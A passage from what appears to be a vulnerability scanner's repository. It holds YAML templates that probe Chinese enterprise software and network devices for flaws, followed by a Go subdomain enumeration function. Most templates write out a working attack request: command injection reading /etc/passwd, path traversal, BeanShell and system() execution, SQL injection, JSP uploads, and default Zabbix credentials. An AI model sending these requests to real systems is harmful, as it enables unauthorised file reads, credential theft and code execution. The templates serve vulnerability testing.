-------------------------------------------------------------------------------- 1 | app: Weaver 2 | query: app:"Weaver" 3 | meta: 4 | name: Weaver E-Cology BeanShell - Remote Command Execution 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: ' Weaver BeanShell contains a remote command execution vulnerability 9 | 
in the bsh.servlet.BshServlet program.' 10 | homepage: "" 11 | author: X prism 12 | references: "" 13 | solution: Update to a new version 14 | create_at: "2024-07-13 12:16:36" 15 | available: false 16 | steps: 17 | variable: [] 18 | verify_steps: 19 | type: and 20 | verify: 21 | - request: 22 | method: POST 23 | path: /weaver/bsh.servlet.BshServlet 24 | redirect: true 25 | header: 26 | - Content-Type: application/x-www-form-urlencoded 27 | params: ' bsh.script=print%28%22xaaaaa%22%29%3B' 28 | response: 29 | - name: body 30 | value: xaaaaa 31 | type: contains 32 | exploit_steps: 33 | type: "" 34 | params: 35 | name: "" 36 | type: input 37 | value: "" 38 | -------------------------------------------------------------------------------- /core/plugins/exploits/weblogic_任意文件上传漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: WebLogic 2 | query: app:"Weblogic" 3 | meta: 4 | name: Weblogic 任意文件上传漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 配置中启用 Web 服务测试页后,未授权的两个页面存在任意上传getshell漏洞,利用该漏洞可以上传任意jsp文件,进而获取服务器权限 9 | homepage: https://www.oracle.com/java/weblogic/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /ws_utc/config.do 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: Work Home Dir 29 | type: contains 30 | create_at: "2022-05-24 16:42:48" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/yapi_rce.yaml: -------------------------------------------------------------------------------- 1 | app: YApi 2 | query: app:"YApi" 3 | meta: 4 | name: YAPI RCE 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description:
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。 9 | homepage: https://github.com/YMFE/yapi 10 | author: Administrator 11 | references: https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /api/user/reg 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: 邮箱不能为空 26 | type: contains 27 | - name: body 28 | value: 禁止注册,请联系管理员 29 | type: not contains 30 | - name: code 31 | value: "200" 32 | type: equals 33 | create_at: "2022-06-09 15:31:18" 34 | -------------------------------------------------------------------------------- /core/plugins/exploits/zabbix_默认账户漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Zabbix 2 | query: app:"Zabbix" 3 | meta: 4 | name: zabbix 默认账户漏洞 5 | level: 4 6 | tags: 7 | - weak_password 8 | description: |- 9 | 默认账号Admin 10 | 默认密码为zabbix 11 | homepage: https://www.zabbix.com/ 12 | author: Administrator 13 | references: "" 14 | solution: "" 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: POST 21 | path: /index.php 22 | redirect: true 23 | header: 24 | - Content-Type: application/x-www-form-urlencoded 25 | params: name=admin&password=zabbix&autologin=1&enter=Sign+in 26 | response: 27 | - name: code 28 | value: "302" 29 | type: equals 30 | - name: header 31 | value: 'Location: zabbix.php?action=dashboard.view' 32 | type: contains 33 | create_at: "2022-06-14 14:50:49" 34 | -------------------------------------------------------------------------------- /core/plugins/exploits/万户协同办公平台未授权访问漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: ezoffice 2 | query: app:"ezoffice" 3 | meta: 4 | name: 万户协同办公平台未授权访问漏洞 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: 
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 升级至最新版 13 | create_at: "2024-07-13 13:06:19" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /defaultroot/evoInterfaceServlet?paramType=user 23 | redirect: true 24 | header: [] 25 | params: "" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | exploit_steps: 31 | type: "" 32 | params: 33 | name: "" 34 | type: input 35 | value: "" 36 | -------------------------------------------------------------------------------- /core/plugins/exploits/中国移动 禹路由 敏感信息泄露漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 中移禹路由器 2 | query: body:"中移" 3 | meta: 4 | name: 中国移动禹路由敏感信息泄露漏洞 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: "" 9 | homepage: https://prismx.io/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /cgi-bin/ExportSettings.sh 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: Password 26 | type: contains 27 | create_at: "2022-05-23 11:15:33" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露.yaml: -------------------------------------------------------------------------------- 1 | app: 防火墙 2 | query: body:"var dkey_verify = Get_Verify_Info(hex_md5" 3 | meta: 4 | name: 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: 
"" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: / 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: var dkey_verify = Get_Verify_Info(hex_md5 26 | type: contains 27 | create_at: "2022-05-23 14:02:43" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/主动安全监控云平台存在任意文件读取漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 808GPS 2 | query: app:"808GPS" 3 | meta: 4 | name: 主动安全监控云平台存在任意文件读取漏洞 5 | level: 4 6 | tags: 7 | - file_read 8 | description: 未对下载接口设置访问权限导致可下载任意文件 9 | homepage: http://www.g-sky.cn/ 10 | author: Prism X 11 | references: "" 12 | solution: 安装补丁 13 | create_at: "2023-10-08 17:09:39" 14 | available: false 15 | steps: 16 | variable: [ ] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties 23 | redirect: true 24 | header: [ ] 25 | params: "" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: '[DATABASE]' 32 | type: contains 33 | exploit_steps: 34 | type: "" 35 | params: 36 | name: "" 37 | type: input 38 | value: "" 39 | -------------------------------------------------------------------------------- /core/plugins/exploits/亿邮电子邮件系统远程命令执行.yaml: -------------------------------------------------------------------------------- 1 | app: 亿邮电子邮件系统 2 | query: body:"亿邮电子邮件系统" 3 | meta: 4 | name: 亿邮电子邮件系统远程命令执行 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 亿邮电子邮件系统 存在远程命令执行漏洞,攻击者可以执行任意命令 9 | homepage: https://www.ecshop.com/ 10 | author: 一曲成殇 11 | references: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 12 | solution: 升级版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /webadm/?q=moni_detail.do&action=gragh 20 
| redirect: true 21 | header: 22 | - name: Content-Type 23 | value: application/x-www-form-urlencoded 24 | params: type='|cat /etc/passwd||' 25 | response: 26 | - name: body 27 | value: /sbin/ 28 | type: contains 29 | create_at: "2021-11-09 22:46:26" 30 | -------------------------------------------------------------------------------- /core/plugins/exploits/大华DSS系统 任意文件下载漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: "大华DSS" 2 | query: title:"DSS-平安城市" 3 | meta: 4 | name: 大华DSS系统 任意文件下载漏洞 5 | level: 3 6 | tags: 7 | - remote_code_execution 8 | description: |- 9 | 浙江大华DSS(digital surveillance system)是一款集视频、报警、门禁、对讲四大安防子系统管理功能于一体的综合管理平台。 10 | 浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。 11 | homepage: https://www.dahuatech.com/ 12 | author: Administrator 13 | references: "" 14 | solution: 升级至安全版本 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 | path: /itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd 22 | redirect: true 23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: root 31 | type: contains 32 | create_at: "2022-05-23 11:51:58" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/大华智慧园区综合管理平台_user_getuserinfobyusername_action_账号密码泄漏漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 大华智慧园区综合管理平台 2 | query: app:"大华智慧园区综合管理平台" 3 | meta: 4 | name: 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 安装补丁、升级系统 13 | create_at: "2024-07-12 23:47:58" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - 
request: 21 | method: GET 22 | path: /admin/user_getUserInfoByUserName.action?userName=system 23 | redirect: true 24 | header: [] 25 | params: "" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: '"loginPass"' 32 | type: equals 33 | exploit_steps: 34 | type: "" 35 | params: 36 | name: "" 37 | type: input 38 | value: "" 39 | -------------------------------------------------------------------------------- /core/plugins/exploits/宝塔_7.42版本_pma未授权漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 宝塔 2 | query: title:"安全入口校验失败" 3 | meta: 4 | name: 宝塔 7.42版本 pma未授权漏洞 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: |- 9 | 宝塔介绍:宝塔Linux面板是提升运维效率的服务器管理软件,支持一键LAMP/LNMP/集群/监控/网站/FTP/数据库/JAVA等100多项服务器管理功能 10 | 漏洞介绍:phpmyadmin没加鉴权,可通过poc直接登录 11 | homepage: https://www.bt.cn/ 12 | author: 一曲成殇 13 | references: https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A 14 | solution: |- 15 | 修复方案: 16 | 1.立即升级版本 17 | 2.关闭888端口 18 | steps: 19 | verify_steps: 20 | type: and 21 | verify: 22 | - request: 23 | method: GET 24 | path: /pma/ 25 | redirect: true 26 | header: [ ] 27 | params: "" 28 | response: 29 | - name: body 30 | value: information_schema 31 | type: contains 32 | create_at: "2021-11-05 23:01:07" 33 | -------------------------------------------------------------------------------- /core/plugins/exploits/极通EWEBSphpinfo泄露.yaml: -------------------------------------------------------------------------------- 1 | app: 新软科技-极通EWEBS 2 | query: app:"新软科技-极通EWEBS" 3 | meta: 4 | name: 极通EWEBSphpinfo泄露 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: "" 9 | homepage: http://www.n-soft.com.cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /testweb.php 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: PHP 
Version 26 | type: contains 27 | create_at: "2022-05-23 14:42:56" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/极通EWEBS任意文件读取.yaml: -------------------------------------------------------------------------------- 1 | app: 新软科技-极通EWEBS 2 | query: app:"新软科技-极通EWEBS" 3 | meta: 4 | name: 极通EWEBS任意文件读取 5 | level: 4 6 | tags: 7 | - file_download 8 | description: "" 9 | homepage: http://www.n-soft.com.cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /casmain.xgi 20 | redirect: false 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: Language_S=../../../../../../../Windows/win.ini 24 | response: 25 | - name: body 26 | value: MAPI= 27 | type: contains 28 | create_at: "2022-05-23 14:41:19" 29 | -------------------------------------------------------------------------------- /core/plugins/exploits/深信服 行为感知系统 c.php 远程命令执行漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 深信服上网行为管理系统 2 | query: 'body:"isHighPerformance : !!SFIsHighPerformance,"' 3 | meta: 4 | name: 深信服 行为感知系统 c.php 远程命令执行漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /tool/log/c.php?strip_slashes=system&host=ipconfig 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: Windows IP 29 | type: contains 30 | - name: body 31 | value: IPv6 32 | type: contains 33 | create_at: "2022-05-23 15:29:37" 34 | -------------------------------------------------------------------------------- 
/core/plugins/exploits/用友-时空ksoa_imageupload_任意文件上传漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 用友软件 2 | query: app:"用友软件" 3 | meta: 4 | name: 用友-时空KSOA ImageUpload 任意文件上传漏洞 5 | level: 4 6 | tags: 7 | - file_upload 8 | description: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 安装补丁 13 | create_at: "2024-07-13 01:31:03" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: POST 22 | path: /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=kaisa.jsp 23 | redirect: true 24 | header: [] 25 | params: kaisa 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: kaisa.jsp 32 | type: contains 33 | exploit_steps: 34 | type: "" 35 | params: 36 | name: "" 37 | type: input 38 | value: "" 39 | -------------------------------------------------------------------------------- /core/plugins/exploits/用友NC_BeanShell远程代码执行漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 用友软件 2 | query: app:"用友软件" 3 | meta: 4 | name: 用友NC BeanShell远程代码执行漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 9 | homepage: http://www.yonyou.com/ 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/aixioxiaoxaio/article/details/117662726 12 | solution: 更新补丁、设置接口访问策略 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /servlet/~ic/bsh.servlet.BshServlet 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: print("hello!"); 29 | type: contains 30 | 
create_at: "2021-11-23 17:51:18" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/用友_U8_OA_test.jsp文件_SQL注入.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: body:"/yyoa/" 3 | meta: 4 | name: 用友 U8 OA test.jsp文件 SQL注入 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: 用友U8-OA存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 9 | homepage: https://www.yonyou.com/ 10 | author: 一曲成殇 11 | references: https://jcyj.chd.edu.cn/2021/0312/c5172a183910/page.htm 12 | solution: 删除该页面、升级系统 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user()) 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: user() 29 | type: contains 30 | create_at: "2021-11-08 09:33:19" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/用友u8c_fileservlet_任意文件读取漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 用友软件 2 | query: app:"用友软件" 3 | meta: 4 | name: 用友U8C FileServlet 任意文件读取漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 用友U8C是一款面向中小企业的ERP软件,为企业提供财务、采购、销售、人力资源、仓储物流等方面的综合管理解决方案。其优秀的功能和服务受到了众多企业的青睐和认可。其FileServlet存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器主机敏感信息。 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 安装补丁、升级至最新版 13 | create_at: "2024-07-13 01:24:08" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== 23 | redirect: true 24 | header: [] 25 | params: "" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: '[fonts]' 32 | type: 
contains 33 | exploit_steps: 34 | type: "" 35 | params: 36 | name: "" 37 | type: input 38 | value: "" 39 | -------------------------------------------------------------------------------- /core/plugins/exploits/用友致远u8-oa_getsessionlist_jsp信息泄露.yaml: -------------------------------------------------------------------------------- 1 | app: 用友软件 2 | query: app:"用友软件" 3 | meta: 4 | name: 用友致远U8-OA getSessionList jsp信息泄露 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: 用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。 9 | homepage: https://www.seeyon.com/ 10 | author: Administrator 11 | references: https://blog.csdn.net/qq_32261191/article/details/124346940 12 | solution: 升级至安全版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: sessionID 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2022-05-25 10:02:28" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/致远OA webmail.do任意文件下载 CNVD-2020-62422.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: 致远OA webmail.do任意文件下载 CNVD-2020-62422 5 | level: 3 6 | tags: 7 | - file_download 8 | description: 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 9 | homepage: https://www.seeyon.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | 
value: workflow 29 | type: contains 30 | create_at: "2022-05-23 16:52:38" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/致远报表密码泄露.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: 致远报表密码泄露 5 | level: 4 6 | tags: 7 | - information_leakage 8 | description: 致远报表任意文件读取造成的密码泄露(采用了帆软报表) 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 安装补丁、升级至最新版 13 | create_at: "2024-07-13 15:47:58" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /seeyonreport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml 23 | redirect: true 24 | header: [] 25 | params: "" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | - name: body 31 | value: rootManagerPassword 32 | type: contains 33 | exploit_steps: 34 | type: "" 35 | params: 36 | name: "" 37 | type: input 38 | value: "" 39 | -------------------------------------------------------------------------------- /core/plugins/exploits/蓝凌_oa_金格组件任意文件上传漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Landray 2 | query: app:"Landray" 3 | meta: 4 | name: 蓝凌_OA_金格组件任意文件上传漏洞 5 | level: 4 6 | tags: 7 | - file_upload 8 | description: 金格组件存在文件上传漏洞 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 升级至最新版 13 | create_at: "2024-07-13 14:24:11" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: POST 22 | path: /sys/attachment/sys_att_main/jg_service.jsp 23 | redirect: true 24 | header: 25 | - Content-Type: application/x-www-form-urlencoded 26 | params: "" 27 | response: 28 | - name: body 29 | value: java.lang.NumberFormatException 30 | type: contains 31 | exploit_steps: 32 | type: "" 33 | params: 34 | 
name: "" 35 | type: input 36 | value: "" 37 | -------------------------------------------------------------------------------- /core/plugins/exploits/蓝凌oa_custom_jsp_任意文件读取漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Landray 2 | query: app:"Landray" 3 | meta: 4 | name: 蓝凌OA custom.jsp 任意文件读取漏洞 5 | level: 4 6 | tags: 7 | - file_read 8 | description: 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 升级至安全版本 13 | create_at: "2024-07-13 14:02:38" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: POST 22 | path: /sys/ui/extend/varkind/custom.jsp 23 | redirect: true 24 | header: 25 | - Content-Type: application/x-www-form-urlencoded 26 | params: var={"body":{"file":"file:///etc/passwd"}} 27 | response: 28 | - name: code 29 | value: "200" 30 | type: equals 31 | - name: body 32 | value: 'root:.*:0:0:' 33 | type: contains 34 | exploit_steps: 35 | type: "" 36 | params: 37 | name: "" 38 | type: input 39 | value: "" 40 | -------------------------------------------------------------------------------- /core/plugins/exploits/蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.yaml: -------------------------------------------------------------------------------- 1 | app: 蜂网企业流控云路由器 2 | query: app:"蜂网企业流控云路由器" 3 | meta: 4 | name: 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: 蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器 9 | homepage: http://www.ifw8.cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /action/usermanager.htm 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: pwd 29 | type: contains 30 | 
create_at: "2022-05-23 16:54:34" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/金和editeprint_aspx文件上传漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 金和协同管理平台 2 | query: ' app:"金和协同管理平台"' 3 | meta: 4 | name: 金和editeprint.aspx文件上传漏洞 5 | level: 4 6 | tags: 7 | - file_upload 8 | description: "" 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: "" 13 | create_at: "2024-07-13 15:02:30" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /C6/Jhsoft.Web.module/eformaspx/editeprint.aspx?key=writefile&filename=1.ashx&KeyCode=sxfZyQBw8yQ=&designpath=/c6/&typeid=&sPathfceform=./ 23 | redirect: true 24 | header: [] 25 | params: "123" 26 | response: 27 | - name: code 28 | value: "200" 29 | type: equals 30 | exploit_steps: 31 | type: "" 32 | params: 33 | name: "" 34 | type: input 35 | value: "" 36 | -------------------------------------------------------------------------------- /core/plugins/exploits/金和oa_jc6任意文件上传.yaml: -------------------------------------------------------------------------------- 1 | app: 金和协同管理平台 2 | query: app:"金和协同管理平台" 3 | meta: 4 | name: 金和OA JC6任意文件上传 5 | level: 4 6 | tags: 7 | - file_upload 8 | description: 金和OA OfficeServer 任意文件上传,攻击者可通过此漏洞获取服务器权限 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: 升级至最新版本 13 | create_at: "2024-07-13 15:05:34" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: POST 22 | path: /jc6/OfficeServer 23 | redirect: true 24 | header: [] 25 | params: "aaccer test 87 0 533 \nDBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\nFILENAME=Li4vLi4vcHVibGljL2VkaXQvaW5mby5qc3A=\n<%out.println(\"only 26 | test\");%" 27 | response: 28 | - name: body 29 | value: aaccer test 30 | type: contains 31 | exploit_steps: 32 | type: "" 33 | 
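params: 34 | name: "" 35 | type: input 36 | value: "" 37 | -------------------------------------------------------------------------------- /core/plugins/exploits/金山 V8终端安全系统任意文件下载漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: 金山终端安全 2 | query: app:"金山终端安全" 3 | meta: 4 | name: 金山 V8终端安全系统任意文件下载漏洞 5 | level: 4 6 | tags: 7 | - file_download 8 | description: "" 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /htmltopdf/downfile.php?filename=downfile.php 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: filename 29 | type: contains 30 | create_at: "2022-05-23 14:38:57" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/锐捷RG-UAC 账户硬编码漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: RG-UAC 2 | query: title:"RG-UAC登录页面" 3 | meta: 4 | name: 锐捷RG-UAC 账户硬编码漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: 锐捷RG-UAC 账户硬编码漏洞 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /get_dkey.php?user=admin 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: password 29 | type: contains 30 | create_at: "2022-05-23 15:17:45" 31 |
--------------------------------------------------------------------------------
/core/subdomain/passive/passive.go:
--------------------------------------------------------------------------------
package passive

import (
	"context"
	"prismx_cli/core/subdomain/subscraping"
	"strings"
	"sync"
	"time"
)

// EnumerateSubdomains queries every source in a.sources for subdomains of
// domain and returns the collected results with their values lower-cased.
//
// One goroutine is started per source. All of them share a context that
// expires after maxEnumTime, and the call returns only once every source's
// result channel has been closed and drained. Results from different sources
// are interleaved in no particular order and are not de-duplicated.
//
// The values originate from third-party services and are only lower-cased
// here; callers should validate them before resolving or scanning them.
//
// An error is returned only when the scraping session cannot be created.
func (a *Agent) EnumerateSubdomains(domain string, keys *subscraping.Keys, maxEnumTime time.Duration) ([]subscraping.Result, error) {
	session, err := subscraping.NewSession(domain, keys, maxEnumTime)
	if err != nil {
		return nil, err
	}

	ctx, cancel := context.WithTimeout(context.Background(), maxEnumTime)
	// Deferred so the context's timer is released on every return path.
	defer cancel()

	var (
		wg      sync.WaitGroup
		mu      sync.Mutex // guards results: every source goroutine appends to it
		results []subscraping.Result
	)

	// Fan out over the configured sources.
	for source, runner := range a.sources {
		wg.Add(1)
		go func(source string, runner subscraping.Source) {
			defer wg.Done()
			for resp := range runner.Run(ctx, domain, session) {
				resp.Value = strings.ToLower(resp.Value)
				// Appending to a shared slice from several goroutines without
				// a lock is a data race and can drop or corrupt entries.
				mu.Lock()
				results = append(results, resp)
				mu.Unlock()
			}
		}(source, runner)
	}
	wg.Wait()
	return results, nil
}

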